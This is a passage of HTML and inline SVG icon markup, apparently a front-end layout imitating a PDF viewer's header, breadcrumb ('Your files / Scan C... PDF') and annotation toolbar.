                        <path d="M14.8692 12.2796C14.8567 12.241 14.835 12.2061 14.806 12.1778C14.7769 12.1494 14.7414 12.1286 14.7026 12.117L9.8915 10.6881C9.84772 10.6751 9.80122 10.6743 9.75705 10.6859C9.71287 10.6974 9.6727 10.7209 9.6409 10.7536C9.6091 10.7864 9.58688 10.8273 9.57666 10.8718C9.56644 10.9163 9.5686 10.9627 9.58291 11.0061L11.1345 15.7081C11.1468 15.7455 11.1679 15.7795 11.1958 15.8072C11.2238 15.835 11.258 15.8557 11.2955 15.8678L16.1178 17.4173C16.1616 17.4314 16.2084 17.4331 16.2531 17.4223C16.2979 17.4114 16.3387 17.3885 16.3712 17.3559C16.4038 17.3233 16.4266 17.2824 16.4374 17.2376C16.4481 17.1929 16.4463 17.146 16.4321 17.1023L14.8692 12.2796ZM12.0049 14.6858L13.7025 13.012L14.5049 15.4888L12.0049 14.6858Z" fill="#E3E3E3" fill-opacity="0.8"/>
                        </g>
                        <defs>
                        <clipPath id="clip0_2421_617">
                        <rect width="18" height="18" fill="white" transform="translate(4 5)"/>
                        </clipPath>
                        </defs>
                        </svg>
                        
                </div>
                <div class="flex flex-row space-x-5 ml-3 text-[#E3E3E3] text-[13px] mt-[-9px]" style="line-height: 44px; opacity: 70%;">
                    <div>
                        Edit
                    </div>
                    <div>
                        Convert
                    </div>
                    <div>
                        E-Sign
                    </div>
                </div>
            </div>
        </div>
        <div id="mid" class="mt-2 flex flex-row text-[#C8C8C8] text-[12px]">
            <div class="mt-1">
                <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2421_623)">
                    <path d="M2.87354 14.3347C1.22364 14.2473 0.0996094 12.9484 0.0996094 11.1755C0.0996094 9.81806 0.833989 8.72675 1.9082 8.34052C1.80224 7.31318 2.06494 6.34736 2.67627 5.56025C3.37451 4.66181 4.4751 4.12275 5.54443 4.14716H5.54687C5.70312 4.14716 5.86181 4.15693 6.02148 4.17597C6.70263 2.49091 8.26953 1.40204 10.185 1.3415C11.415 1.25654 12.8003 1.78095 13.6089 2.63203C14.5161 3.58711 14.9717 4.69551 14.9267 5.83808C14.9267 5.86933 14.9258 5.90546 14.9243 5.9455C16.6811 6.23114 17.9189 7.96747 17.9189 10.2311C17.9189 12.6125 16.353 14.3 14.1108 14.3347H2.87354ZM2.78516 9.68964C2.1958 9.68964 1.59961 10.1999 1.59961 11.1755C1.59961 11.944 1.94482 12.7839 2.91357 12.8356L14.0991 12.8347C15.2148 12.8171 16.4189 12.1242 16.4189 10.2311C16.4189 8.61591 15.6235 7.45428 14.4844 7.40594C14.3413 7.40008 14.2344 7.39813 14.1636 7.4035L13.2285 7.48455L13.3559 6.55437C13.4018 6.21941 13.4272 5.97039 13.4272 5.80828C13.457 5.04021 13.1518 4.32928 12.5215 3.66521C12.0181 3.13494 11.0679 2.78435 10.2568 2.83953C8.73828 2.88787 7.59863 3.79949 7.25878 5.21941L7.07372 5.99138L6.31347 5.76286C6.04394 5.68229 5.76806 5.64811 5.48193 5.64665C4.87353 5.64665 4.26269 5.96306 3.86084 6.48015C3.39209 7.08415 3.2666 7.88494 3.50684 8.73552L3.77637 9.68962L2.78516 9.68964Z" fill="#C8C8C8" fill-opacity="0.8"/>
                    <path d="M2.87354 14.3347C1.22364 14.2473 0.0996094 12.9484 0.0996094 11.1755C0.0996094 9.81806 0.833989 8.72675 1.9082 8.34052C1.80224 7.31318 2.06494 6.34736 2.67627 5.56025C3.37451 4.66181 4.4751 4.12275 5.54443 4.14716H5.54687C5.70312 4.14716 5.86181 4.15693 6.02148 4.17597C6.70263 2.49091 8.26953 1.40204 10.185 1.3415C11.415 1.25654 12.8003 1.78095 13.6089 2.63203C14.5161 3.58711 14.9717 4.69551 14.9267 5.83808C14.9267 5.86933 14.9258 5.90546 14.9243 5.9455C16.6811 6.23114 17.9189 7.96747 17.9189 10.2311C17.9189 12.6125 16.353 14.3 14.1108 14.3347H2.87354ZM2.78516 9.68964C2.1958 9.68964 1.59961 10.1999 1.59961 11.1755C1.59961 11.944 1.94482 12.7839 2.91357 12.8356L14.0991 12.8347C15.2148 12.8171 16.4189 12.1242 16.4189 10.2311C16.4189 8.61591 15.6235 7.45428 14.4844 7.40594C14.3413 7.40008 14.2344 7.39813 14.1636 7.4035L13.2285 7.48455L13.3559 6.55437C13.4018 6.21941 13.4272 5.97039 13.4272 5.80828C13.457 5.04021 13.1518 4.32928 12.5215 3.66521C12.0181 3.13494 11.0679 2.78435 10.2568 2.83953C8.73828 2.88787 7.59863 3.79949 7.25878 5.21941L7.07372 5.99138L6.31347 5.76286C6.04394 5.68229 5.76806 5.64811 5.48193 5.64665C4.87353 5.64665 4.26269 5.96306 3.86084 6.48015C3.39209 7.08415 3.2666 7.88494 3.50684 8.73552L3.77637 9.68962L2.78516 9.68964Z" fill="#C8C8C8" fill-opacity="0.8"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2421_623">
                    <rect width="18" height="18" fill="#C8C8C8"/>
                    </clipPath>
                    </defs>
                    </svg>
            </div>
            <div class="flex flex-row space-x-[10px] pl-[12px] mt-1">
                <div class="">
                    Your files
                </div>
                <div>
                    /
                </div>
                <div style="text-overflow: ellipsis; max-width: 60px; white-space: nowrap; overflow: hidden; color: white;">
                    Scan C...
                </div>
                <div class="text-[10px] mt-[1px]">
                    PDF
                </div>
                <div class="-mt-[1px]">
                    <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M8.99942 11.4999C9.098 11.5 9.19562 11.4807 9.28668 11.4429C9.37774 11.4051 9.46043 11.3498 9.53 11.2799C10.136 10.7027 11.4994 9.24205 12.7694 8.04049C12.9101 7.89985 12.9891 7.70909 12.9891 7.5102C12.9891 7.3113 12.9101 7.12055 12.7694 6.97991C12.6288 6.83927 12.438 6.76025 12.2391 6.76025C12.0402 6.76025 11.8495 6.83927 11.7088 6.97991L8.99942 9.68936L6.29 6.97991C6.14936 6.83927 5.95861 6.76025 5.75971 6.76025C5.56081 6.76025 5.37006 6.83927 5.22942 6.97991C5.08878 7.12055 5.00977 7.3113 5.00977 7.5102C5.00977 7.70909 5.08878 7.89985 5.22942 8.04049L8.46884 11.2799C8.5384 11.3498 8.62109 11.4051 8.71215 11.4429C8.80321 11.4807 8.90084 11.5 8.99942 11.4999Z" fill="#C8C8C8"/>
                        </svg>
                        
                </div>
            </div>
        </div>
        <div id="third" class="pr-4 flex flex-row space-x-[10px] pt-1">
            <div>
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M13.5538 20.6501C14.4239 20.8092 15.3179 20.781 16.1762 20.5676C17.0346 20.3541 17.8376 19.9602 18.5318 19.4121L22.8667 23.7465C22.9605 23.8403 23.0877 23.893 23.2203 23.893C23.3529 23.893 23.4801 23.8403 23.5738 23.7465L23.9273 23.3931C23.9737 23.3467 24.0105 23.2915 24.0357 23.2309C24.0608 23.1702 24.0737 23.1052 24.0737 23.0395C24.0737 22.9739 24.0608 22.9089 24.0357 22.8482C24.0105 22.7875 23.9737 22.7324 23.9273 22.686L19.5924 18.3515C20.4318 17.2771 20.8963 15.9574 20.9151 14.5941C20.9339 13.2308 20.5058 11.8988 19.6963 10.8016C18.8868 9.7045 17.7404 8.90252 16.4323 8.51823C15.1241 8.13395 13.7261 8.18849 12.4518 8.67352C11.1776 9.15855 10.0971 10.0474 9.37557 11.2043C8.65402 12.3611 8.33103 13.7224 8.45595 15.0801C8.58088 16.4379 9.14684 17.7173 10.0674 18.7231C10.9879 19.7289 12.2124 20.4057 13.5538 20.6501ZM14.6803 9.74999C15.6198 9.74999 16.5381 10.0286 17.3193 10.5505C18.1004 11.0724 18.7092 11.8143 19.0687 12.6822C19.4282 13.5502 19.5223 14.5053 19.339 15.4267C19.1557 16.3481 18.7034 17.1944 18.0391 17.8587C17.3748 18.523 16.5284 18.9754 15.607 19.1587C14.6856 19.342 13.7305 19.2479 12.8626 18.8884C11.9946 18.5289 11.2528 17.9201 10.7308 17.1389C10.2089 16.3578 9.9303 15.4395 9.9303 14.5C9.93173 13.2407 10.4326 12.0333 11.3231 11.1428C12.2136 10.2523 13.421 9.75142 14.6803 9.74999Z" fill="#B9B9B9"/>
                    </svg>
                    
            </div>
            <div>
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M24.4327 16.4961C24.1925 15.4092 23.6525 15.1768 23.3019 15.1768C23.296 15.1768 22.8966 15.1423 22.8966 15.1423C22.7211 9.63452 19.3229 8.325 16.3868 8.22852L15.6573 8.23242C12.7508 8.32874 9.35771 9.63742 9.17992 15.1377L8.76671 15.1738C8.35171 15.1738 7.80671 15.4033 7.56554 16.4961C7.44679 17.1257 7.39182 17.7656 7.40147 18.4062C7.40147 19.6455 7.5294 23.6894 9.23547 23.6894L12.545 23.415C12.8601 23.3735 13.1468 23.2114 13.3448 22.9627C13.5428 22.7141 13.6366 22.3984 13.6066 22.082L13.1456 16.039C13.1336 15.872 13.0886 15.709 13.0132 15.5594C12.9377 15.4099 12.8334 15.2769 12.7061 15.168C12.5908 15.0705 12.4573 14.9969 12.3133 14.9514C12.1693 14.906 12.0177 14.8897 11.8673 14.9033L10.6968 15.0053C10.8537 11.5368 12.4509 9.83946 15.6856 9.7324L16.3663 9.7285C19.6253 9.83567 21.2251 11.5359 21.3798 15.0112L20.13 14.9033C19.9798 14.8899 19.8284 14.9064 19.6846 14.9519C19.5408 14.9973 19.4074 15.0707 19.2921 15.168C19.1649 15.2769 19.0605 15.41 18.9851 15.5595C18.9096 15.709 18.8646 15.872 18.8527 16.0391L18.3917 22.0821C18.3621 22.4005 18.4577 22.7179 18.6582 22.967C18.8588 23.2161 19.1486 23.3772 19.466 23.4161L22.8234 23.6924C24.4689 23.6924 24.5968 19.6465 24.5968 18.4063C24.6065 17.7657 24.5515 17.1257 24.4327 16.4961ZM12.0919 21.9482L9.41124 22.1728C8.88673 20.381 8.76797 18.4948 9.06358 16.6514L11.671 16.4258L12.0919 21.9482ZM22.588 22.1699L19.9064 21.9482L20.3273 16.4258L22.9337 16.6484C23.2302 18.4917 23.1121 20.378 22.588 22.1699Z" fill="#B9B9B9"/>
                    </svg>
            </div>
            <div>
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2421_643)">
                    <path d="M15.6464 22.2431C15.5972 22.2441 15.5494 22.25 15.5 22.25C13.8577 22.2496 12.2724 21.6473 11.0442 20.557C11.33 20.1285 11.7169 19.7769 12.1707 19.5332C12.6246 19.2895 13.1314 19.1613 13.6465 19.1597C13.8251 19.1307 13.9915 19.0508 14.1259 18.9297C14.2603 18.8085 14.3569 18.6512 14.4043 18.4766C14.4102 18.461 14.918 16.8375 14.4502 16.2955C13.9746 15.7146 13.7096 14.9899 13.6982 14.2393C13.6982 13.4028 13.9326 12 15.5 12C16.6475 12 17.332 12.8369 17.332 14.2178C17.311 14.9698 17.0375 15.6928 16.5556 16.2705C16.2437 16.6183 16.3325 17.3947 16.441 17.9225C16.9332 17.1952 17.5917 16.5958 18.3619 16.1738C18.6492 15.5678 18.8091 14.9095 18.832 14.2393C18.832 12.0029 17.4932 10.5 15.5 10.5C13.4941 10.5 12.1982 11.9678 12.1982 14.2481C12.2116 15.2606 12.5426 16.2433 13.1445 17.0576C13.132 17.281 13.1046 17.5034 13.0625 17.7231C12.4674 17.7892 11.8913 17.9731 11.3679 18.264C10.8446 18.555 10.3844 18.9473 10.0142 19.418C9.39652 18.5534 8.99182 17.5552 8.83302 16.5046C8.67422 15.454 8.76581 14.3808 9.10034 13.3723C9.43487 12.3638 10.0029 11.4486 10.7581 10.7012C11.5133 9.95378 12.4344 9.39533 13.4463 9.07131C14.4582 8.74729 15.5323 8.66686 16.5812 8.83658C17.6301 9.00629 18.6241 9.42136 19.4822 10.048C20.3403 10.6746 21.0382 11.495 21.5192 12.4424C22.0002 13.3898 22.2506 14.4375 22.25 15.5C22.25 15.5494 22.2395 15.5961 22.2385 15.6452C22.7555 15.7641 23.2524 15.9576 23.7136 16.2197C23.7343 15.9821 23.75 15.7429 23.75 15.5C23.75 13.8683 23.2661 12.2733 22.3596 10.9165C21.4531 9.55984 20.1646 8.50242 18.6571 7.878C17.1497 7.25357 15.4909 7.0902 13.8905 7.40853C12.2902 7.72685 10.8202 8.51259 9.66637 9.66637C8.51259 10.8202 7.72685 12.2902 7.40853 13.8905C7.0902 15.4909 7.25357 17.1497 7.878 18.6571C8.50242 20.1646 9.55984 21.4531 10.9165 22.3596C12.2733 23.2661 13.8683 23.75 15.5 23.75C15.7429 23.75 15.9819 23.7343 16.2197 23.7136C15.9584 23.2538 15.7652 22.7585 15.6464 22.2431Z" fill="#B9B9B9"/>
                    <path d="M24.5 20.25H21.75V17.5C21.75 17.3674 21.6973 17.2402 21.6036 17.1464C21.5098 17.0527 21.3826 17 21.25 17H20.75C20.6174 17 20.4902 17.0527 20.3964 17.1464C20.3027 17.2402 20.25 17.3674 20.25 17.5V20.25H17.5C17.3674 20.25 17.2402 20.3027 17.1464 20.3964C17.0527 20.4902 17 20.6174 17 20.75V21.25C17 21.3826 17.0527 21.5098 17.1464 21.6036C17.2402 21.6973 17.3674 21.75 17.5 21.75H20.25V24.5C20.25 24.6326 20.3027 24.7598 20.3964 24.8536C20.4902 24.9473 20.6174 25 20.75 25H21.25C21.3826 25 21.5098 24.9473 21.6036 24.8536C21.6973 24.7598 21.75 24.6326 21.75 24.5V21.75H24.5C24.6326 21.75 24.7598 21.6973 24.8536 21.6036C24.9473 21.5098 25 21.3826 25 21.25V20.75C25 20.6174 24.9473 20.4902 24.8536 20.3964C24.7598 20.3027 24.6326 20.25 24.5 20.25Z" fill="#B9B9B9"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2421_643">
                    <rect width="18" height="18" fill="white" transform="translate(7 7)"/>
                    </clipPath>
                    </defs>
                    </svg>                    
            </div>
            <div>
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M9.11102 17.9201C8.43762 18.5936 8.05323 19.503 8.03945 20.4553C8.02566 21.4076 8.38357 22.3277 9.03719 23.0204C9.69081 23.7131 10.5887 24.1238 11.5402 24.1653C12.4916 24.2067 13.4218 23.8757 14.1332 23.2425L14.2838 23.1001L16.2004 21.2094C16.2948 21.1163 16.3483 20.9895 16.3492 20.8569C16.3501 20.7243 16.2983 20.5967 16.2052 20.5023L15.854 20.1464C15.7609 20.052 15.6341 19.9984 15.5015 19.9975C15.3689 19.9966 15.2413 20.0484 15.1469 20.1416L13.2268 22.0359C12.8334 22.4289 12.3036 22.6552 11.7476 22.6676C11.1916 22.6801 10.6523 22.4777 10.2416 22.1027C9.83103 21.7276 9.58079 21.2087 9.54296 20.6539C9.50512 20.0991 9.68261 19.551 10.0385 19.1237L10.1566 18.9954L13.4383 15.8927C13.7966 15.5345 14.2694 15.3136 14.774 15.2685C15.2786 15.2234 15.7831 15.357 16.1992 15.646L16.3372 15.7507L16.5301 15.9097C16.6325 15.9941 16.7641 16.0343 16.8961 16.0216C17.0281 16.0089 17.1496 15.9442 17.234 15.8419L17.552 15.456C17.6363 15.3537 17.6765 15.222 17.6638 15.09C17.6511 14.958 17.5864 14.8365 17.4841 14.7522L17.2912 14.5932C16.6194 14.0396 15.7722 13.7437 14.9018 13.7589C14.0314 13.774 13.195 14.099 12.5428 14.6756L9.11102 17.9201Z" fill="#B9B9B9"/>
                    <path d="M22.6007 14.7828C23.2754 14.1083 23.66 13.1971 23.6727 12.2432C23.6854 11.2894 23.3251 10.3683 22.6687 9.67609C22.0123 8.98392 21.1115 8.5754 20.1583 8.53755C19.2051 8.4997 18.2748 8.83552 17.5656 9.47347L17.4136 9.61734L15.424 11.6903C15.3785 11.7377 15.3428 11.7936 15.3189 11.8547C15.295 11.9159 15.2834 11.9812 15.2848 12.0468C15.2861 12.1125 15.3004 12.1772 15.3268 12.2374C15.3531 12.2975 15.3911 12.3519 15.4384 12.3973L15.7992 12.7436C15.8948 12.8354 16.0231 12.8854 16.1557 12.8827C16.2882 12.88 16.4143 12.8247 16.5061 12.7291L18.485 10.6671C18.8811 10.2707 19.4157 10.0438 19.976 10.0343C20.5363 10.0248 21.0783 10.2334 21.4876 10.6162C21.8969 10.9989 22.1415 11.5257 22.1696 12.0853C22.1977 12.645 22.0071 13.1937 21.6382 13.6155L18.4272 17.0741C18.0473 17.454 17.5394 17.6787 17.0027 17.7044C16.466 17.73 15.939 17.5548 15.5245 17.2128L15.394 17.0956L15.2148 16.9213C15.1197 16.8289 14.9919 16.7779 14.8593 16.7798C14.7267 16.7816 14.6003 16.836 14.5078 16.9311L14.1592 17.2895C14.0667 17.3845 14.0158 17.5124 14.0176 17.645C14.0195 17.7776 14.0739 17.904 14.1689 17.9965L14.3481 18.1708C15.0148 18.8175 15.9023 19.1867 16.831 19.2039C17.7596 19.221 18.6601 18.8848 19.3502 18.2631L19.5072 18.1147L22.6007 14.7828Z" fill="#B9B9B9"/>
                    </svg>                    
            </div>
            <div>
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M10.5 17C11.1904 17 11.75 16.4404 11.75 15.75C11.75 15.0596 11.1904 14.5 10.5 14.5C9.80964 14.5 9.25 15.0596 9.25 15.75C9.25 16.4404 9.80964 17 10.5 17Z" fill="#B9B9B9"/>
                    <path d="M16 17C16.6904 17 17.25 16.4404 17.25 15.75C17.25 15.0596 16.6904 14.5 16 14.5C15.3096 14.5 14.75 15.0596 14.75 15.75C14.75 16.4404 15.3096 17 16 17Z" fill="#B9B9B9"/>
                    <path d="M21.5 17C22.1904 17 22.75 16.4404 22.75 15.75C22.75 15.0596 22.1904 14.5 21.5 14.5C20.8096 14.5 20.25 15.0596 20.25 15.75C20.25 16.4404 20.8096 17 21.5 17Z" fill="#B9B9B9"/>
                    </svg>                    
            </div>
            <div>
                <svg width="14" height="38" viewBox="0 0 14 38" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <line x1="7.5" y1="7" x2="7.5" y2="31" stroke="#CDCDCD" stroke-opacity="0.4"/>
                    </svg>                    
            </div>
            <div class="p-2">
                <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2423_683)">
                    <path d="M9 17.25C7.36831 17.25 5.77325 16.7661 4.41655 15.8596C3.05984 14.9531 2.00242 13.6646 1.378 12.1571C0.753575 10.6497 0.590197 8.99085 0.908525 7.39051C1.22685 5.79017 2.01259 4.32016 3.16637 3.16637C4.32016 2.01259 5.79017 1.22685 7.39051 0.908525C8.99085 0.590197 10.6497 0.753575 12.1571 1.378C13.6646 2.00242 14.9531 3.05984 15.8596 4.41655C16.7661 5.77325 17.25 7.36831 17.25 9C17.25 11.188 16.3808 13.2865 14.8336 14.8336C13.2865 16.3808 11.188 17.25 9 17.25ZM9 2.25C7.66498 2.25 6.35994 2.64588 5.2499 3.38758C4.13987 4.12928 3.27471 5.18349 2.76382 6.41689C2.25293 7.65029 2.11925 9.00749 2.3797 10.3169C2.64015 11.6262 3.28303 12.829 4.22703 13.773C5.17104 14.717 6.37377 15.3599 7.68314 15.6203C8.99252 15.8808 10.3497 15.7471 11.5831 15.2362C12.8165 14.7253 13.8707 13.8601 14.6124 12.7501C15.3541 11.6401 15.75 10.335 15.75 9C15.75 7.20979 15.0388 5.4929 13.773 4.22703C12.5071 2.96116 10.7902 2.25 9 2.25Z" fill="#B9B9B9"/>
                    <path d="M8.86915 4.61763C9.22785 4.61248 9.58492 4.66693 9.92579 4.77876C10.2166 4.87294 10.4839 5.02809 10.71 5.23384C10.9186 5.4277 11.0832 5.66417 11.1924 5.9272C11.3063 6.19957 11.3635 6.49233 11.3604 6.78755C11.3722 7.16655 11.2883 7.54241 11.1163 7.88032C10.9527 8.17842 10.7475 8.45168 10.5069 8.69184C10.2364 8.96235 9.9984 9.21202 9.79301 9.44084C9.61099 9.61629 9.50125 9.85353 9.48539 10.1058C9.49567 10.3768 9.57247 10.6411 9.70902 10.8754C9.76468 10.9506 9.74613 10.9877 9.65336 10.9877H8.47755C8.45134 10.988 8.42517 10.9858 8.39942 10.9808C8.36653 10.9707 8.33599 10.9541 8.30958 10.932C8.18528 10.7853 8.09432 10.6134 8.04298 10.4281C7.99956 10.2729 7.97625 10.1127 7.97364 9.95154C7.9693 9.63815 8.07041 9.33239 8.26075 9.08338C8.49455 8.78127 8.74423 8.4918 9.00875 8.21619C9.19438 8.0262 9.36543 7.8225 9.52046 7.60681C9.64337 7.4329 9.70926 7.22512 9.70903 7.01216C9.71103 6.89711 9.68904 6.7829 9.64448 6.67681C9.59992 6.57072 9.53375 6.47507 9.4502 6.39595C9.1967 6.20219 8.879 6.1121 8.56153 6.14395C8.25301 6.1396 7.94578 6.18444 7.65137 6.27677C7.39296 6.35973 7.14416 6.47005 6.90919 6.60587C6.89836 6.61489 6.88471 6.61982 6.87062 6.61982C6.85652 6.61982 6.84287 6.61489 6.83204 6.60587C6.82101 6.59779 6.81207 6.58719 6.80595 6.57497C6.79984 6.56274 6.79673 6.54922 6.79688 6.53555V5.23384C6.79688 5.15962 6.81544 5.11274 6.85255 5.09419C7.47097 4.76029 8.16669 4.59588 8.86915 4.61763ZM8.99515 14.0258C8.74785 14.0346 8.50687 13.9466 8.32328 13.7807C8.15231 13.5918 8.05764 13.3461 8.05764 13.0913C8.05764 12.8365 8.15231 12.5907 8.32328 12.4018C8.41318 12.3177 8.51881 12.2521 8.6341 12.2088C8.74939 12.1656 8.87209 12.1455 8.99515 12.1498C9.12049 12.1448 9.24552 12.1658 9.36234 12.2115C9.47915 12.2572 9.58523 12.3267 9.67386 12.4154C9.75987 12.5045 9.82709 12.61 9.87155 12.7256C9.916 12.8412 9.93678 12.9645 9.93265 13.0883C9.93922 13.213 9.92103 13.3378 9.87913 13.4555C9.83723 13.5731 9.77244 13.6813 9.68851 13.7738C9.59644 13.8612 9.48736 13.9287 9.36806 13.9721C9.24876 14.0154 9.12184 14.0337 8.99515 14.0258Z" fill="#B9B9B9"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2423_683">
                    <rect width="18" height="18" fill="white"/>
                    </clipPath>
                    </defs>
                    </svg>                    
            </div>
            <div class="p-2">
                <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M16.263 12.8618L15.8665 12.1733C14.984 10.9535 14.4745 9.50373 14.3997 8L14.3977 6.33984C14.3175 4.97162 13.7207 3.68492 12.7279 2.74001C11.7352 1.7951 10.4206 1.26252 9.05006 1.25C7.66116 1.26806 6.3298 1.80762 5.3202 2.7616C4.31059 3.71557 3.69653 5.01425 3.59987 6.3999V7.8999C3.48392 9.41785 2.96546 10.8775 2.09787 12.1284L1.73654 12.7617C1.57112 12.9712 1.48686 13.2334 1.49924 13.5C1.49939 13.5617 1.50693 13.6232 1.5217 13.6831C1.57566 13.992 1.74023 14.2706 1.98466 14.4669C2.22909 14.6633 2.53665 14.7639 2.84987 14.75H6.39967V15.2998C6.37301 15.7788 6.48238 16.2557 6.71513 16.6752C6.94789 17.0948 7.29455 17.4399 7.7151 17.6709C8.11343 17.8722 8.55348 17.977 8.99977 17.977C9.44606 17.977 9.88611 17.8722 10.2844 17.6709C10.7076 17.443 11.0565 17.0985 11.2897 16.6782C11.5229 16.2579 11.6305 15.7795 11.5999 15.2998V14.75H15.1497C15.4393 14.7683 15.7267 14.688 15.9649 14.5221C16.203 14.3562 16.378 14.1145 16.4612 13.8364C16.4865 13.7602 16.4994 13.6804 16.4993 13.6001C16.5115 13.3336 16.4277 13.0716 16.263 12.8618ZM10.0999 15.2998C10.1225 15.4995 10.0891 15.7016 10.0033 15.8834C9.91761 16.0652 9.78298 16.2195 9.61451 16.3291C9.42383 16.4252 9.21328 16.4752 8.99976 16.4752C8.78625 16.4752 8.5757 16.4252 8.38502 16.3291C8.21749 16.2186 8.0836 16.0641 7.998 15.8825C7.9124 15.701 7.87838 15.4994 7.89967 15.2998V14.75H10.0999V15.2998ZM3.1858 13.2485L3.38795 12.8935C4.40326 11.4162 4.99525 9.68941 5.09987 7.8999L5.09791 6.46C5.17433 5.45975 5.62231 4.5243 6.35371 3.83771C7.08511 3.15113 8.04698 2.76311 9.05006 2.75C10.0334 2.76182 10.9761 3.14426 11.6898 3.8209C12.4035 4.49754 12.8355 5.41855 12.8997 6.3999V8C12.9653 9.78832 13.556 11.5178 14.5979 12.9727L14.7571 13.25L3.1858 13.2485Z" fill="#B9B9B9"/>
                    </svg>                    
            </div>
            <div class="pt-1">
                <img src="https://pps.services.adobe.com/api/profile/image/default/53f0ab3c-343b-4d92-9fd1-1d0a7db29bd7/138" alt="" width="24">
            </div>
        </div>
    </div>
    
    <div id="main" class="flex flex-row justify-between">
        <div class="mt-4 ml-4 max-w-10 max-h-[240px] flex flex-col bg-[#323232]" id="toolbar">
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <rect x="4" y="4" width="32" height="32" rx="2" fill="#2680EB"/>
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M24.6529 20.3088L16.72 12.6914C16.324 12.3112 16 12.4492 16 12.9982V24.4881C16 25.0333 16.3019 25.151 16.6709 24.7496L19.1941 21.8582L21.5587 26.7366C21.6166 26.856 21.7195 26.9474 21.8447 26.9909C21.97 27.0344 22.1074 27.0263 22.2267 26.9685L23.1258 26.5326C23.2451 26.4748 23.3365 26.3719 23.38 26.2466C23.4235 26.1214 23.4154 25.984 23.3576 25.8646L20.9995 21.0001H24.3747C24.9236 21.0001 25.0488 20.689 24.6529 20.3088Z" fill="white"/>
                    <path d="M33.7492 28C33.7162 27.9999 33.6836 28.0064 33.6531 28.0189C33.6226 28.0315 33.5949 28.05 33.5716 28.0732L28.0737 33.5716C28.0385 33.6067 28.0146 33.6514 28.0048 33.7001C27.9951 33.7488 28.0001 33.7993 28.0191 33.8452C28.0381 33.8911 28.0704 33.9303 28.1117 33.9579C28.153 33.9854 28.2016 34.0001 28.2513 34H33.7492C33.8157 34 33.8795 33.9736 33.9265 33.9265C33.9736 33.8795 34 33.8157 34 33.7492V28.2508C34 28.1843 33.9736 28.1205 33.9265 28.0735C33.8795 28.0264 33.8157 28 33.7492 28Z" fill="white"/>
                    </svg>                
            </div>
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M26.089 27.7498H20.0128C16.1642 27.7498 12.4274 24.702 11.8527 21.0936C11.4464 18.5408 12.2575 16.035 14.0773 14.2156C15.9181 12.3758 18.4664 11.5584 21.0685 11.9744C24.8781 12.5828 27.7506 16.0526 27.7506 20.0457V26.0887C27.7506 27.0047 27.005 27.7498 26.089 27.7498ZM19.7472 13.368C18.0158 13.368 16.3786 14.0369 15.1373 15.2772C13.6618 16.7518 13.0045 18.786 13.3341 20.8572C13.7916 23.7303 16.9127 26.2498 20.0128 26.2498H26.089C26.1764 26.2498 26.2506 26.1756 26.2506 26.0887V20.0457C26.2506 16.7821 23.921 13.949 20.8322 13.4549C20.4684 13.3973 20.1056 13.368 19.7472 13.368ZM24.0006 18.2498V17.7498C24.0006 17.4737 23.7768 17.2498 23.5006 17.2498H16.5006C16.2245 17.2498 16.0006 17.4737 16.0006 17.7498V18.2498C16.0006 18.526 16.2245 18.7498 16.5006 18.7498H23.5006C23.7768 18.7498 24.0006 18.526 24.0006 18.2498ZM22.0006 21.2498V20.7498C22.0006 20.4737 21.7768 20.2498 21.5006 20.2498H16.5006C16.2245 20.2498 16.0006 20.4737 16.0006 20.7498V21.2498C16.0006 21.526 16.2245 21.7498 16.5006 21.7498H21.5006C21.7768 21.7498 22.0006 21.526 22.0006 21.2498Z" fill="#B9B9B9"/>
                    <path d="M33.7492 28C33.7162 27.9999 33.6836 28.0064 33.6531 28.0189C33.6226 28.0315 33.5949 28.05 33.5716 28.0732L28.0737 33.5716C28.0385 33.6067 28.0146 33.6514 28.0048 33.7001C27.9951 33.7488 28.0001 33.7993 28.0191 33.8452C28.0381 33.8911 28.0704 33.9303 28.1117 33.9579C28.153 33.9854 28.2016 34.0001 28.2513 34H33.7492C33.8157 34 33.8795 33.9736 33.9265 33.9265C33.9736 33.8795 34 33.8157 34 33.7492V28.2508C34 28.1843 33.9736 28.1205 33.9265 28.0735C33.8795 28.0264 33.8157 28 33.7492 28Z" fill="#B9B9B9"/>
                    </svg>
            </div>
            <div>
                <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path opacity="0.5" d="M21.9988 23.4009H28.4988L24.9988 26.9009H18.2988L21.9988 23.4009Z" fill="#B9B9B9"/>
                    <path d="M13.2996 23.2007L11.7996 25.5007C11.2996 26.2007 11.6996 26.9007 12.3996 26.9007H16.0996C16.2625 26.9017 16.4224 26.8571 16.5613 26.7718C16.7001 26.6866 16.8123 26.5642 16.8852 26.4185C16.958 26.2728 16.9886 26.1096 16.9735 25.9474C16.9584 25.7852 16.8981 25.6305 16.7996 25.5007L14.5996 23.2007C14.5195 23.1064 14.4199 23.0307 14.3077 22.9788C14.1955 22.9268 14.0733 22.8999 13.9496 22.8999C13.8259 22.8999 13.7037 22.9268 13.5915 22.9788C13.4792 23.0307 13.3796 23.1064 13.2996 23.2007Z" fill="#B9B9B9"/>
